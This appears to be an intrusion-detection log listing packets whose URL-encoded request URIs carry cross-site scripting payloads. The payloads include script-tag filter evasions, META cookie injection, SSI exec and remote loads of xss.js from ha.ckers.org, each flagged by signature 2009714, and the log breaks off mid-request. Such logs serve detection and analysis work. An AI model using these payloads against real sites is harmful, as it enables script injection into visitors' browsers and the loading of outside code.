Packet [1185]	Uri [/web/?demo-name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1186]	Uri [/web/?demo-name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1201]	Uri [/web/?demo-name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1202]	Uri [/web/?demo-name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1205]	Uri [/web/?demo-name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1206]	Uri [/web/?demo-name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1215]	Uri [/web/?demo-name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1216]	Uri [/web/?demo-name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1223]	Uri [/web/?demo-name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1224]	Uri [/web/?demo-name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1285]	Uri [/web/?demo-copy=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1286]	Uri [/web/?demo-copy=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1291]	Uri [/web/?demo-copy=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1292]	Uri [/web/?demo-copy=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1309]	Uri [/web/?demo-copy=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [1310]	Uri [/web/?demo-copy=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [1311]	Uri [/web/?demo-copy=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1312]	Uri [/web/?demo-copy=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1313]	Uri [/web/?demo-copy=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1314]	Uri [/web/?demo-copy=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1315]	Uri [/web/?demo-copy=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1316]	Uri [/web/?demo-copy=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1319]	Uri [/web/?demo-copy=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1320]	Uri [/web/?demo-copy=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1341]	Uri [/web/?demo-copy=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1342]	Uri [/web/?demo-copy=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1347]	Uri [/web/?demo-copy=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1348]	Uri [/web/?demo-copy=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1357]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1358]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1359]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1360]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1361]	Uri [/web/?demo-copy=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1362]	Uri [/web/?demo-copy=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1363]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1364]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1369]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1370]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1375]	Uri [/web/?demo-copy=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1376]	Uri [/web/?demo-copy=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1387]	Uri [/web/?demo-copy=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1388]	Uri [/web/?demo-copy=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1395]	Uri [/web/?demo-copy=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1396]	Uri [/web/?demo-copy=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1405]	Uri [/web/?demo-copy=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1406]	Uri [/web/?demo-copy=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1421]	Uri [/web/?demo-copy=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1422]	Uri [/web/?demo-copy=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1425]	Uri [/web/?demo-copy=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1426]	Uri [/web/?demo-copy=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1435]	Uri [/web/?demo-copy=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1436]	Uri [/web/?demo-copy=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1443]	Uri [/web/?demo-copy=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1444]	Uri [/web/?demo-copy=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1505]	Uri [/web/?email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1506]	Uri [/web/?email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1511]	Uri [/web/?email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1512]	Uri [/web/?email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1529]	Uri [/web/?email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [1530]	Uri [/web/?email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [1531]	Uri [/web/?email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1532]	Uri [/web/?email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1533]	Uri [/web/?email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1534]	Uri [/web/?email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1535]	Uri [/web/?email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1536]	Uri [/web/?email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1539]	Uri [/web/?email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1540]	Uri [/web/?email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1561]	Uri [/web/?email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1562]	Uri [/web/?email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1567]	Uri [/web/?email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1568]	Uri [/web/?email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1577]	Uri [/web/?email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1578]	Uri [/web/?email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1579]	Uri [/web/?email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1580]	Uri [/web/?email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1581]	Uri [/web/?email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1582]	Uri [/web/?email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1583]	Uri [/web/?email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1584]	Uri [/web/?email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1589]	Uri [/web/?email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1590]	Uri [/web/?email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1595]	Uri [/web/?email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1596]	Uri [/web/?email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1607]	Uri [/web/?email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1608]	Uri [/web/?email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1615]	Uri [/web/?email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1616]	Uri [/web/?email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1625]	Uri [/web/?email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1626]	Uri [/web/?email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1641]	Uri [/web/?email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1642]	Uri [/web/?email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1645]	Uri [/web/?email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1646]	Uri [/web/?email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1655]	Uri [/web/?email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1656]	Uri [/web/?email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1663]	Uri [/web/?email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1664]	Uri [/web/?email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1701]	Uri [/web/?demo-email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&demo-priority=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&demo-human=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&demo-name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&demo-copy=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1706]	Uri [/web/?demo-email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&demo-priority=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&demo-human=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&demo-name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&demo-copy=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+na